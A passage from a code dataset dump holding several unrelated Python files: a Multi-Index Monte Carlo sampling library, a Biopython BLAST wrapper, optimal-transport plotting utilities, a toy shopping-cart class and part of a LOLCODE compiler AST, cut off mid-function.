None:\n raise ValueError(\"Cannot set both fnSampleLvl and fnSampleQoI\")\n self.fnSampleLvl = lambda *a: GenericSampleLvl(self.fnSampleQoI, *a)\n\n if self.fnSampleLvl is None:\n raise ValueError(\"Must set the sampling functions fnSampleLvl or fnSampleQoI\")\n\n def setFunctions(self, **kwargs):\n # fnExtendLvls(): Returns new lvls and number of samples on each.\n # called only once if the Bayesian method is used\n # fnSampleLvl(moments, mods, inds, M):\n # Returns M, array: M sums of mods*inds, and total\n # (linear) time it took to compute them\n # fnItrDone(i, TOLs, totalTime): Called at the end of iteration\n # i out of TOLs\n # fnWorkModel(lvls): Returns work estimate of lvls\n # fnHierarchy(lvls): Returns associated hierarchy of lvls\n for k in kwargs.keys():\n if k not in [\"fnExtendLvls\", \"fnSampleLvl\",\n \"fnItrDone\", \"fnWorkModel\",\n \"fnHierarchy\", \"fnSampleQoI\"]:\n raise KeyError(\"Invalid function name\")\n setattr(self, k, kwargs[k])\n\n @staticmethod\n def addOptionsToParser(parser, pre='-mimc_', additional=True, default_bayes=True):\n def str2bool(v):\n # susendberg's function\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n mimcgrp = parser.add_argument_group('MIMC', 'Arguments to control MIMC logic')\n mimcgrp.register('type', 'bool', str2bool)\n\n def add_store(name, **kwargs):\n if \"default\" in kwargs and \"help\" in kwargs:\n kwargs[\"help\"] += \" (default: {})\".format(kwargs[\"default\"])\n mimcgrp.add_argument(pre + name, dest=name,\n action=\"store\",\n **kwargs)\n\n add_store('verbose', type='bool', default=False,\n help=\"Verbose output\")\n add_store('bayesian', type='bool', default=False,\n help=\"Use Bayesian fitting to estimate bias, variance and optimize number \\\nof levels in every iteration. This is based on CMLMC.\")\n add_store('dim', type=int, help=\"Number of dimensions used in MIMC\")\n add_store('moments', type=int, default=2, help=\"Number of moments to compute\")\n add_store('reuse_samples', type='bool', default=True,\n help=\"Reuse samples between iterations\")\n add_store('abs_bnd', type='bool', default=False,\n help=\"Take absolute value of deltas when \\\nestimating bias (sometimes that's too conservative).\")\n add_store('const_theta', type='bool', default=False,\n help=\"Use the same theta for all iterations\")\n add_store('Ca', type=float, default=3,\n help=\"Parameter to control confidence level\")\n add_store('theta', type=float, default=0.5,\n help=\"Minimum theta or error splitting parameter.\")\n add_store('incL', type=int, default=2,\n help=\"Maximum increment of number of levels \\\nbetween iterations\")\n add_store('w', nargs='+', type=float,\n help=\"Weak convergence rates. Must be scalar or of size -dim. \\\nNot needed if fnExtendLvls is specified and -bayesian is False.\")\n add_store('s', nargs='+', type=float,\n help=\"Strong convergence rates. Must be a scalar or of size -dim. \\\nNot needed if fnExtendLvls is specified and -bayesian is False.\")\n add_store('TOL', type=float,\n help=\"The required tolerance for the MIMC run\")\n add_store('beta', type=float, nargs='+',\n help=\"Level separation parameter. to be used \\\nwith get_geometric_hl. Not needed if fnHierarchy is provided.\")\n add_store('gamma', type=float, nargs='+',\n help=\"Work exponent to be used with work_estimate.\\\nNot needed if fnWorkModel and fnExtendLvls are provided.\")\n\n # The following arguments are not needed if bayes is False\n if default_bayes:\n add_store('bayes_k0', type=float, default=0.1,\n help=\"Variance in prior of the constant \\\nin the weak convergence model. Not needed if -bayesian is False.\")\n add_store('bayes_k1', type=float, default=0.1,\n help=\"Variance in prior of the constant \\\nin the strong convergence model. Not needed if -bayesian is False.\")\n add_store('bayes_w_sig', type=float, default=-1,\n help=\"Variance in prior of the power \\\nin the weak convergence model, negative values lead to disabling the fitting. \\\nNot needed if -bayesian is False.\")\n add_store('bayes_s_sig', type=float, default=-1,\n help=\"Variance in prior of the power \\\nin the weak convergence model, negative values lead to disabling the fitting. \\\nNot needed if -bayesian is False.\")\n add_store('bayes_fit_lvls', type=float, default=1000,\n help=\"Maximum number of levels used to fit data. \\\nNot needed if -bayesian is False.\")\n\n # The following arguments are not always needed, and they have\n # a default value\n if additional:\n add_store('max_TOL', type=float, default=0.1,\n help=\"The (approximate) tolerance for \\\nthe first iteration. Not needed if TOLs is provided to doRun.\")\n add_store('M0', type=int, default=10, help=\"The initial number of samples \\\nused to estimate the sample variance when not using the Bayesian estimators. \\\nNot needed if fnExtendLvls is provided.\")\n add_store('min_lvls', type=int, default=2,\n help=\"The initial number of levels to run \\\nthe first iteration. Not needed if fnExtendLvls is provided.\")\n add_store('max_add_itr', type=int, default=2,\n help=\"Maximum number of additonal iterations\\\nto run when the MIMC is expected to but is not converging.\\\nNot needed if TOLs is provided to doRun.\")\n add_store('r1', type=float, default=2,\n help=\"A parameters to control to tolerance sequence \\\nfor tolerance larger than TOL. Not needed if TOLs is provided to doRun.\")\n add_store('r2', type=float, default=1.1,\n help=\"A parameters to control to tolerance sequence \\\nfor tolerance smaller than TOL. Not needed if TOLs is provided to doRun.\")\n add_store('h0inv', type=float, nargs='+', default=2,\n help=\"Minimum element size get_geometric_hl. \\\nNot needed if fnHierarchy is provided.\")\n return mimcgrp\n\n def calcTotalWork(self):\n return np.sum(self.Wl_estimate * self.data.M)\n\n def totalErrorEst(self):\n return self.bias + self.stat_error\n\n def __str__(self):\n output = \"Time={:.12e}\\nEg={:.12e}\\n\\\nBias={:.12e}\\nStatErr={:.12e}\\\n\\nTotalErrEst={:.12e}\\n\".format(self.data.calcTotalTime(),\n self.data.calcEg(),\n self.bias,\n self.stat_error,\n self.totalErrorEst())\n V = self.Vl_estimate\n E = self.data.calcEl()\n T = self.data.calcTl()\n\n output += (\"{:<8}{:^20}{:^20}{:>8}{:>15}\\n\".format(\n \"Level\", \"E\", \"V\", \"M\", \"Time\"))\n for i in range(0, len(self.data.lvls)):\n assert(V[i]>=0)\n #,100 * np.sqrt(V[i]) / np.abs(E[i])\n output += (\"{:<8}{:>+20.12e}{:>20.12e}{:>8}{:>15.6e}\\n\".format(\n str(self.data.lvls[i]), E[i], V[i], self.data.M[i], T[i]))\n return output\n\n ################## Bayesian specific functions\n def _estimateBias(self):\n if not self.params.bayesian:\n bnd = is_boundary(self.data.dim, self.data.lvls)\n if np.sum(bnd) == len(self.data.lvls):\n return np.inf\n bnd_val = self.data[bnd].calcEl()\n if self.params.abs_bnd:\n return np.abs(np.sum(np.abs(bnd_val)))\n return np.abs(np.sum(bnd_val))\n return self._estimateBayesianBias()\n\n def _estimateBayesianBias(self, L=None):\n L = L or len(self.all_data.lvls)-1\n if L <= 1:\n raise Exception(\"Must have at least 2 levels\")\n hl = self.fnHierarchy(np.arange(0, L+1).reshape((-1, 1))).reshape(1, -1)[0]\n return self.Q.W * hl[-1]**self.Q.w[0]\n\n def _estimateBayesianVl(self, L=None):\n if np.sum(self.all_data.M) == 0:\n return self.all_data.calcVl()\n oL = len(self.all_data.lvls)-1\n L = L or oL\n if L <= 1:\n raise Exception(\"Must have at least 2 levels\")\n hl = self.fnHierarchy(np.arange(0, L+1).reshape((-1, 1))).reshape(1, -1)[0]\n M = np.concatenate((self.all_data[1:].M, np.zeros(L-oL)))\n s1 = np.concatenate((self.all_data.psums[1:, 0], np.zeros(L-oL)))\n m1 = np.concatenate((self.all_data[1:].calcEl(), np.zeros(L-oL)))\n s2 = np.concatenate((self.all_data.psums[1:, 1],\n np.zeros(L-oL)))\n mu = self.Q.W*(hl[:-1]**self.Q.w[0] - hl[1:]**self.Q.w[0])\n Lambda = 1./(self.Q.S*(hl[:-1]**(self.Q.s[0]/2.) - hl[1:]**(self.Q.s[0]/2.))**2)\n G_3 = self.params.bayes_k1 * Lambda + M/2.0\n # G_4 = self.params.bayes_k1 + \\\n # 0.5*M*(s2 + self.params.bayes_k0 * (m1 - mu)**2 /\n # (self.params.bayes_k0 + M)) - 0.5*m1**2\n G_4 = self.params.bayes_k1 + \\\n 0.5*(s2 -2*s1*m1 + s1*m1 +\n M*self.params.bayes_k0*(m1-mu)**2 / (self.params.bayes_k0+M) )\n return np.concatenate((self.all_data[0].calcVl(), G_4 / G_3))\n\n def _estimateQParams(self):\n if not self.params.bayesian:\n return\n if np.sum(self.all_data.M) == 0:\n return # Cannot really estimate anything without at least some samples\n L = len(self.all_data.lvls)-1\n if L <= 1:\n raise Exception(\"Must have at least 2 levels\")\n hl = self.fnHierarchy(np.arange(0, L+1).reshape((-1, 1))).reshape(1, -1)[0]\n begin = np.maximum(1, L-self.params.bayes_fit_lvls)\n M = self.all_data[begin:].M\n # m1 = self.all_data[begin:].calcEl()\n # m2 = self.all_data[begin:].calcEl(moment=2)\n # wl = hl[begin:]**self.Q.w[0] - hl[(begin-1):-1]**self.Q.w[0]\n # sl = (hl[begin:]**(self.Q.s[0]/2.) - hl[(begin-1):-1]**(self.Q.s[0]/2.))**-2\n # self.Q.W = np.abs(np.sum(wl * sl * M * m1) / np.sum(M * wl**2 * sl))\n # self.Q.S = np.sum(sl * (m2 - 2*m1*self.Q.W*wl + self.Q.W**2*wl**2)) / np.sum(M)\n s1 = self.all_data.psums[begin:, 0]\n s2 = self.all_data.psums[begin:, 1]\n t1 = hl[(begin-1):-1]**self.Q.w[0] - hl[begin:]**self.Q.w[0]\n t2 = (hl[(begin-1):-1]**(self.Q.s[0]/2.) - hl[begin:]**(self.Q.s[0]/2.))**-2\n self.Q.W = np.abs(np.sum(s1 * t1 * t2) / np.sum(M * t1**2 * t2))\n self.Q.S = np.sum(t2*(s2 - 2*s1*t1*self.Q.W + M*self.Q.W**2*t1**2)) / np.sum(M)\n if self.params.bayes_w_sig > 0 or self.params.bayes_s_sig > 0:\n # TODO: Estimate w=q_1, s=q_2\n raise NotImplemented(\"TODO, estimate w and s\")\n\n def _estimateOptimalL(self, TOL):\n assert self.params.bayesian, \"MIMC should be Bayesian to \\\nestimate optimal number of levels\"\n minL = len(self.data)\n minWork = np.inf\n LsRange = range(len(self.data.lvls), len(self.data.lvls)+1+self.params.incL)\n for L in LsRange:\n bias_est = self._estimateBayesianBias(L)\n if bias_est >= TOL and L < LsRange[-1]:\n continue\n Wl = self.fnWorkModel(np.arange(0, L+1).reshape((-1, 1)))\n M = self._calcTheoryM(TOL,\n theta=self._calcTheta(TOL, bias_est),\n Vl=self._estimateBayesianVl(L), Wl=Wl)\n totalWork = np.sum(Wl*M)\n if totalWork < minWork:\n minL = L\n minWork = totalWork\n return minL\n\n ################## END: Bayesian specific function\n def _estimateAll(self):\n self._estimateQParams()\n self.Vl_estimate = self.all_data.calcVl() if not self.params.bayesian \\\n else self._estimateBayesianVl()\n self.Wl_estimate = self.fnWorkModel(self.data.lvls)\n self.bias = self._estimateBias()\n self.stat_error = np.inf if np.any(self.data.M == 0) \\\n else self.params.Ca * \\\n np.sqrt(np.sum(self.Vl_estimate / self.data.M))\n\n def _addLevels(self, lvls):\n self.data.addLevels(lvls)\n if self.all_data != self.data:\n self.all_data.addLevels(lvls)\n\n def _genSamples(self, totalM, verbose):\n lvls = self.data.lvls\n s = len(lvls)\n M = np.zeros(s, dtype=np.int)\n psums = np.zeros_like(self.data.psums)\n p = np.arange(1, psums.shape[1]+1)\n t = np.zeros(s)\n for i in range(0, s):\n if totalM[i] <= self.data.M[i]:\n continue\n if verbose:\n print(\"# Doing\", totalM[i]-self.data.M[i], \"of level\", lvls[i])\n mods, inds = lvl_to_inds_general(lvls[i])\n M[i], psums[i, :], t[i] = self.fnSampleLvl(p, mods, inds,\n totalM[i] -\n self.data.M[i])\n self.data.addSamples(psums, M, t)\n if self.all_data != self.data:\n self.all_data.addSamples(psums, M, t)\n self._estimateAll()\n\n def _calcTheta(self, TOL, bias_est):\n if not self.params.const_theta:\n return 1 - bias_est/TOL\n return self.params.theta\n\n def _calcTheoryM(self, TOL, theta, Vl, Wl, ceil=True, minM=1):\n M = (theta * TOL / self.params.Ca)**-2 *\\\n np.sum(np.sqrt(Wl * Vl)) * np.sqrt(Vl / Wl)\n M = np.maximum(M, minM)\n if ceil:\n M = np.ceil(M).astype(np.int)\n return M\n\n def doRun(self, finalTOL=None, TOLs=None, verbose=None):\n self._checkFunctions()\n finalTOL = finalTOL or self.params.TOL\n TOLs = TOLs or get_tol_sequence(finalTOL, self.params.max_TOL,\n max_additional_itr=self.params.max_add_itr,\n r1=self.params.r1,\n r2=self.params.r2)\n if verbose is None:\n verbose = self.params.verbose\n if len(self.data.lvls) != 0:\n warnings.warn(\"Running the same object twice, resetting\")\n self.data = MIMCData(self.data.dim)\n if not all(x >= y for x, y in zip(TOLs, TOLs[1:])):\n raise Exception(\"Tolerances must be decreasing\")\n\n import time\n tic = time.time()\n self.Q.theta = self.params.theta\n self.bias = np.inf\n self.stat_error = np.inf\n import gc\n def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):\n return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n for itrIndex, TOL in enumerate(TOLs):\n if verbose:\n print(\"# TOL\", TOL)\n while True:\n gc.collect()\n if self.params.bayesian and len(self.data.lvls) > 0:\n L = self._estimateOptimalL(TOL)\n if L > len(self.data.lvls):\n self._addLevels(np.arange(len(self.data.lvls),\n L+1).reshape((-1, 1)))\n self._estimateAll()\n\n self.Q.theta = np.maximum(self._calcTheta(TOL, self.bias),\n self.params.theta)\n if len(self.data.lvls) == 0 or \\\n (not self.params.bayesian and self.bias > (1 - self.Q.theta) * TOL):\n # Bias is not satisfied (or this is the first iteration)\n # Add more levels\n newlvls, newTodoM = self.fnExtendLvls()\n prev = len(self.data.lvls)\n self._addLevels(newlvls)\n self._genSamples(np.concatenate((self.data.M[:prev],\n newTodoM)), verbose)\n self._estimateAll()\n self.Q.theta = np.maximum(self._calcTheta(TOL, self.bias),\n self.params.theta)\n\n todoM = self._calcTheoryM(TOL, self.Q.theta,\n self.Vl_estimate,\n self.Wl_estimate)\n if verbose:\n print(\"# theta\", self.Q.theta)\n print(\"# New M: \", todoM)\n if not self.params.reuse_samples:\n self.data.zero_samples()\n self._genSamples(todoM, verbose)\n if verbose:\n print(self, end=\"\")\n print(\"------------------------------------------------\")\n if self.params.bayesian or self.totalErrorEst() < TOL:\n break\n\n totalTime = time.time() - tic\n tic = time.time()\n if verbose:\n print(\"{} took {}\".format(TOL, totalTime))\n print(\"################################################\")\n if self.fnItrDone:\n self.fnItrDone(itrIndex, TOL, totalTime)\n if isclose(TOL, finalTOL) and self.totalErrorEst() < finalTOL:\n break\n\n\n@public\ndef GenericSampleLvl(fnSampleQoI, moments, mods, inds, M):\n import time\n timeStart = time.time()\n psums = np.zeros(len(moments))\n for m in range(0, M):\n solves = fnSampleQoI(inds)\n psums += np.sum(mods*solves)**moments\n return M, psums, time.time() - timeStart\n\n\n@public\ndef extend_lvls_tensor(dim, lvls, M0, min_deg=1):\n if len(lvls) <= 0:\n out_lvls = [[0] * dim]\n seeds = lvls = out_lvls\n deg = 0\n else:\n out_lvls = list()\n deg = np.max([np.max(ll) for ll in lvls])\n seeds = [ll for ll in lvls if np.max(ll) == deg]\n\n additions = [f for f in itertools.product([0, 1], repeat=dim) if max(f) > 0]\n while True:\n newlvls = list()\n for l in seeds:\n newlvls.extend([(np.array(l) + a).tolist() for a in\n additions if (np.array(l) + a).tolist()\n not in newlvls])\n out_lvls.extend(newlvls)\n deg += 1\n if deg >= min_deg:\n break\n seeds = newlvls\n return out_lvls, M0*np.ones(len(out_lvls), dtype=np.int)\n\n\n@public\ndef extend_lvls_td(w, lvls, M0, min_deg=2):\n # w specifies the dimension\n prev_deg = np.max(np.sum(np.array(\n [w*np.array(l) for l in lvls]), axis=1)) if lvls else 0\n max_deg = prev_deg\n while True:\n max_deg += np.min(w)\n max_deg = np.maximum(max_deg, min_deg)\n C, _ = setutil.AnisoProfCalculator(w*0, w).GetIndexSet(max_deg)\n all_lvls = C.to_dense_matrix() - 1\n newlvls = [lvl.tolist() for lvl in all_lvls if lvl.tolist()\n not in lvls]\n if len(newlvls) > 0:\n return newlvls, M0*np.ones(len(newlvls), dtype=np.int)\n\n\n@public\ndef work_estimate(lvls, gamma):\n return np.prod(np.exp(np.array(lvls)*gamma), axis=1)\n\n\ndef is_boundary(d, lvls):\n if len(lvls) == 1:\n return [True] # Special case for zero element\n bnd = np.zeros(len(lvls), dtype=int)\n for i in range(0, d):\n x = np.zeros(d)\n x[i] = 1\n bnd += np.array([1 if l[i] == 0 or (np.array(l)+x).tolist() in lvls else 0 for l in lvls])\n return bnd < d\n\n\ndef lvl_to_inds_general(lvl):\n\n \"\"\"\n This routine takes a multi-index level and produces\n a list of levels and weights that are needed to evaluate\n the multi-dimensional difference estimator.\n\n For example, in the MLMC setting the function\n x,y = lvl_to_inds_general([N])\n\n sets y to an array of [N] and [N-1]\n and x to an array of 1 and -1.\n\n \"\"\"\n\n lvl = np.array(lvl, dtype=np.int)\n seeds = list()\n for i in range(0, lvl.shape[0]):\n if lvl[i] == 0:\n seeds.append([0])\n else:\n seeds.append([0, 1])\n inds = np.array(list(itertools.product(*seeds)), dtype=np.int)\n mods = (2 * np.sum(lvl) % 2 - 1) * (2 * (np.sum(inds, axis=1) % 2) - 1)\n return mods, np.tile(lvl, (inds.shape[0], 1)) - inds\n\n\n@public\ndef get_geometric_hl(lvls, h0inv, beta):\n return beta**(-np.array(lvls, dtype=np.float))/h0inv\n\n\n@public\ndef get_tol_sequence(TOL, maxTOL, max_additional_itr=1, r1=2, r2=1.1):\n # number of iterations until TOL\n eni = int(-(np.log(TOL)-np.log(maxTOL))/np.log(r1))\n return np.concatenate((TOL*r1**np.arange(eni, -1, -1),\n TOL*r2**-np.arange(1, max_additional_itr+1)))\n\n@public\ndef get_optimal_hl(mimc):\n if mimc.data.dim != 1:\n raise NotImplemented(\"Optimized hierarchies are only supported\\\n for one-dimensional problems\")\n\n # TODO: Get formula from HajiAli 2015, Optimizing MLMC hierarchies\n raise NotImplemented(\"TODO: get_optimal_hl\")\n\n\n@public\ndef calcMIMCRate(w, s, gamma):\n d = len(w)\n if len(s) != d or len(gamma) != d:\n raise ValueError(\"w,s and gamma must have the same size\")\n delta = (gamma-s)/(2*w)\n zeta = np.max(delta)\n xi = np.min((2.*w - s) / gamma)\n d2 = np.sum(delta == 0)\n dz = np.sum(delta == zeta)\n rate = -2.*(1. + np.maximum(0, zeta))\n log_rate = np.nan\n if (zeta <= 0 and zeta < xi) or (zeta == xi and zeta == 0 and d <= 2):\n log_rate = 2*d2\n elif zeta > 0 and xi > 0:\n log_rate = 2*(dz-1)*(zeta+1)\n elif zeta == 0 and xi == 0 and d > 2:\n log_rate = 2*d2 + d - 3\n elif zeta > 0 and xi == 0:\n log_rate = d-1 + 2*(dz-1)*(1+zeta)\n return rate, log_rate\n","sub_path":"mimclib/mimc.py","file_name":"mimc.py","file_ext":"py","file_size_in_byte":31722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"229709535","text":"from Bio.Blast import NCBIWWW\nfrom Bio import SeqIO \n#pre condition- check if file is there and is in fasta format-- check file format\n#dont need an assertion here for pre condit because the first line in the code below already checks for that\ndef sequence_blaster(fasta_path, results_path):\n record = SeqIO.read(fasta_path, format=\"fasta\")\n result_handle = NCBIWWW.qblast(\"blastn\", \"nt\", record.format(\"fasta\"))\n \n save_file = open(results_path, 'w')\n save_file.write(result_handle.read())\n save_file.close()\n assert os.stat(results_file).st_size != 0 \n #post condition- check results file is not size zero\n ","sub_path":"nave-powerspythonpackage/sequence_blaster.py","file_name":"sequence_blaster.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"463086475","text":"# coding=utf-8\n# Copyright 2021 Google LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Plotting utils.\"\"\"\n\nfrom typing import Union\n\nimport jax.numpy as jnp\nimport matplotlib.pyplot as plt\nfrom ott.tools import transport\nimport scipy\n\n\ndef bidimensional(x: jnp.ndarray, y: jnp.ndarray):\n \"\"\"Applies PCA to reduce to bimensional data.\"\"\"\n if x.shape[1] < 3:\n return x, y\n\n u, s, _ = scipy.sparse.linalg.svds(jnp.concatenate([x, y], axis=0), k=2)\n proj = u * s\n k = x.shape[0]\n return proj[:k], proj[k:]\n\n\ndef _couplings(ax,\n x: jnp.ndarray,\n y: jnp.ndarray,\n a: jnp.ndarray,\n b: jnp.ndarray,\n matrix: jnp.ndarray,\n threshold: float = 0.0,\n scale: int = 200,\n cmap: str = 'Purples'):\n \"\"\"Plots 2-D couplings. Projects via PCA if data is higher dimensional.\"\"\"\n x, y = bidimensional(x, y)\n\n sa, sb = jnp.min(a) / scale, jnp.min(b) / scale\n ax.scatter(*x.T, s=a / sa, edgecolors='k', marker='o', label='x')\n ax.scatter(*y.T, s=b / sb, edgecolors='k', marker='X', label='y')\n\n cmap = plt.get_cmap(cmap)\n u, v = jnp.where(matrix > threshold)\n c = matrix[jnp.where(matrix > threshold)]\n xy = jnp.concatenate([x[u], y[v]], axis=-1)\n for i in range(xy.shape[0]):\n strength = jnp.max(jnp.array(matrix.shape)) * c[i]\n ax.plot(xy[i, [0, 2]], xy[i, [1, 3]],\n linewidth=0.5 + 4 * strength,\n color=cmap(strength),\n zorder=0, alpha=0.7)\n ax.legend(fontsize=15)\n\n\ndef couplings(arg: Union[transport.Transport, jnp.ndarray],\n y: jnp.ndarray = None,\n a: jnp.ndarray = None,\n b: jnp.ndarray = None,\n matrix: jnp.ndarray = None,\n ax=None,\n **kwargs):\n \"\"\"Plots 2D points and the couplings between them.\"\"\"\n if ax is None:\n _, ax = plt.subplots(1, 1, figsize=(8, 5))\n\n if isinstance(arg, transport.Transport):\n ot = arg\n return _couplings(ax, ot.geom.x, ot.geom.y, ot.a, ot.b, ot.matrix, **kwargs)\n\n return _couplings(ax, arg, y, a, b, matrix, **kwargs)\n\n\ndef _barycenters(ax,\n y: jnp.ndarray,\n a: jnp.ndarray,\n b: jnp.ndarray,\n matrix: jnp.ndarray,\n scale: int = 200):\n \"\"\"Plots 2-D sinkhorn barycenters.\"\"\"\n sa, sb = jnp.min(a) / scale, jnp.min(b) / scale\n ax.scatter(*y.T, s=b / sb, edgecolors='k', marker='X', label='y')\n tx = 1 / a[:, None] * jnp.matmul(matrix, y)\n ax.scatter(*tx.T, s=a / sa, edgecolors='k', marker='X', label='T(x)')\n ax.legend(fontsize=15)\n\n\ndef barycenters(arg: Union[transport.Transport, jnp.ndarray],\n a: jnp.ndarray = None,\n b: jnp.ndarray = None,\n matrix: jnp.ndarray = None,\n ax=None,\n **kwargs):\n \"\"\"Plots the barycenters, from the Transport object or from arguments.\"\"\"\n if ax is None:\n _, ax = plt.subplots(1, 1, figsize=(8, 5))\n\n if isinstance(arg, transport.Transport):\n ot = arg\n return _barycenters(ax, ot.geom.y, ot.a, ot.b, ot.matrix, **kwargs)\n\n return _barycenters(ax, arg, a, b, matrix, **kwargs)\n","sub_path":"ott/tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"477141381","text":"class ShoppingCart():\n \n def __init__(self):\n self.total = 0\n self.items = dict()\n \n def add_item(self,item_name,quantity,price):\n \"\"\"This method should adds the cost of the added items to the current value of total , and \n also adds an entry to the items dict such that the key is the item_name and the value is the quantity of the item \"\"\"\n self.total = self.total + (price*quantity)\n self.items[item_name] = quantity\n \n def remove_item(self,item_name,quantity,price):\n if item_name in self.items:\n if quantity < self.items[item_name] and quantity > 0:\n self.items[item_name] -= quantity\n self.total -= price*quantity\n\n\n elif quantity >= self.items[item_name]:\n self.total -= price*self.items[item_name]\n del self.items[item_name]\n\n \n def checkout(self,cash_paid):\n \"\"\" return the customer's balance\"\"\"\n #if cash paid is less than total\n if cash_paid < self.total:\n return \"Cash paid not enough\"\n else:\n return cash_paid - self.total\n \nclass Shop(ShoppingCart):\n \n def __init__(self):\n ShoppingCart.__init__(self) \n self.quantity = 100 \n \n def remove_item(self):\n self.quantity = self.quantity - 1\n \nif __name__ == \"__main__\":\n cart = ShoppingCart()\n cart.add_item(\"MacBook\",100,450)\n cart.add_item(\"MacAir\",600,650)\n cart.add_item(\"HP\",140,200)\n cart.add_item(\"Acer\",80,320)\n \n #show all items\n print(\"All items: \",cart.items)\n #show total\n print(\"current Total:\",cart.total)\n \n #remove macbook\n cart.remove_item(\"MacBook\",120,450)\n \n print()\n #show all items\n print(\"after removing Macbook,120,450:\",cart.items)\n print(\"Total after removing:\",cart.total)\n \n print()\n print(\"after payment of 200\")\n print(cart.checkout(200))\n \n print()\n #instance of shop\n shop = Shop()\n shop.remove_item()\n print(\"Quantity in shop:\",shop.quantity)\n","sub_path":"ShoppingCart.py","file_name":"ShoppingCart.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246591914","text":"import abc\nfrom enum import Enum\n\nPrimitiveType = Enum('PrimitiveType', 'NUMBR NUMBAR LETTR TROOF NUMBRS NUMBARS LETTRS TROOFS YARN')\nclass CompilerTypeError(Exception): pass\nclass IndexTypeError(Exception): pass\n\n\nclass ASTNode(abc.ABC):\n def __init__(self, children=None):\n self.children = children if children else []\n \n def __repr__(self):\n result = type(self).__name__ # class name\n if self.children:\n children_reprs = [repr(child) for child in self.children]\n children_lines = '\\n'.join(children_reprs)\n children_lines_tabbed = map(lambda x: '\\t' + x, children_lines.splitlines())\n result += '\\n' + '\\n'.join(children_lines_tabbed)\n return result\n\n @abc.abstractmethod\n def compile(self, symbol_table, compiled_code):\n for child in self.children:\n child.compile(symbol_table, compiled_code)\n\n\nclass CodeBlock(ASTNode):\n \"\"\"\n Represents a block of statements. \n For instance, the main program or part of a \n flow control statement. Its children are a list\n of statements.\n \"\"\"\n def __init__(self, children):\n super().__init__(children=children)\n\n def compile(self, symbol_table, compiled_code):\n symbol_table.increment_scope()\n super().compile(symbol_table, compiled_code)\n symbol_table.decrement_scope()\n\nclass MainProgram(CodeBlock):\n \"\"\"\n Represents the entire program, has a CodeBlock as\n its only child, and a version\n \"\"\"\n def __init__(self, children, version):\n super().__init__(children=children)\n assert version.value == '1.450', version\n\n def compile(self, symbol_table, compiled_code):\n self.children[0].compile(symbol_table, compiled_code)\n\nclass PrimitiveLiteral(ASTNode):\n \"\"\"\n An abstract base class that represents primitive literals\n The string of the value is stored as its only child.\n \"\"\"\n def __init__(self, data, expr_type):\n super().__init__(children=[data])\n self.expr_type = expr_type\n\n def compile(self, symbol_table, compiled_code):\n entry = symbol_table.get_entry(expr_type=self.expr_type)\n compiled_code.append(['VAL_COPY', self.children[0], entry])\n return entry\n\nclass NumbrLiteral(PrimitiveLiteral):\n \"\"\"\n An expression that represents a Numbr (like 5).\n The string of the value is stored as its only child.\n \"\"\"\n def __init__(self, data):\n PrimitiveLiteral.__init__(self, data=data, expr_type=PrimitiveType.NUMBR)\n\nclass TroofLiteral(PrimitiveLiteral):\n \"\"\"\n An expression that represents a Troof (like WIN).\n The string of the value is stored as its only child.\n Note the enclosing quotes are included in the string.\n \"\"\"\n def __init__(self, data):\n PrimitiveLiteral.__init__(self, data=data, expr_type=PrimitiveType.TROOF)\n\n def compile(self, symbol_table, compiled_code):\n entry = symbol_table.get_entry(expr_type=self.expr_type)\n value = 1 if self.children[0] == 'WIN' else 0\n compiled_code.append(['VAL_COPY', value, entry])\n return entry\n\nclass LettrLiteral(PrimitiveLiteral):\n \"\"\"\n An expression that represents a Lettr (like 'a').\n The string of the value is stored as its only child.\n Note the enclosing quotes are included in the string.\n \"\"\"\n def __init__(self, data):\n PrimitiveLiteral.__init__(self, data=data, expr_type=PrimitiveType.LETTR)\n \n def compile(self, symbol_table, compiled_code):\n entry = symbol_table.get_entry(expr_type=self.expr_type)\n lettr = self.children[0] # like ':)'\n mapping_to_lmao_char = {\n \"':)'\": r\"'\\n'\",\n \"':>'\": r\"'\\t'\",\n \"':''\": r\"'\\''\",\n \"'::'\": r\"':'\", \n r\"'\\'\": r\"'\\\\'\", \n } \n lmao_char = mapping_to_lmao_char.get(lettr, lettr)\n compiled_code.append(['VAL_COPY', lmao_char, entry])\n return entry\n\nclass YarnLiteral(ASTNode):\n \"\"\"\n An expression that represents a YarnLiteral.\n An array of LETTR_LITERALs\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n escape = {\n ':)': r'\\n',\n ':>': r'\\t',\n ':\\'': r'\\'',\n ':\"' : r'\"',\n '::': r':', \n r\"'\\'\": r\"'\\\\\\'\",\n } \n char_lst = []\n word = self.children[0][1:-1]\n size = len(word)\n i = 0\n while i < size:\n if word[i] == ':':\n if f\"{word[i]}{word[i+1]}\" in escape:\n escp_char = word[i] + word[i+1]\n char_lst.append(escape[escp_char])\n i += 2\n else:\n char_lst.append(word[i])\n i += 1\n else:\n if word[i] == \"'\":\n char_lst.append('\\\\\\'')\n i += 1\n else:\n char_lst.append(word[i])\n i += 1\n ar_size = len(char_lst) \n ar_name = symbol_table.get_entry(PrimitiveType.LETTRS, \"a\")\n compiled_code.append(['AR_SET_SIZE', ar_name, ar_size])\n \n for i in range(ar_size):\n compiled_code.append(['AR_SET_IDX', ar_name, i, \"'{}'\".format(char_lst[i])])\n return ar_name\n \nclass VisibleStatement(ASTNode):\n \"\"\"\n A statement generated from \"VISIBLE , , \".\n The expr node is stored as its only child.\n \"\"\"\n def __init__(self, children, output_newline=True):\n super().__init__(children=children)\n self.output_newline = output_newline\n\n def compile(self, symbol_table, compiled_code):\n def 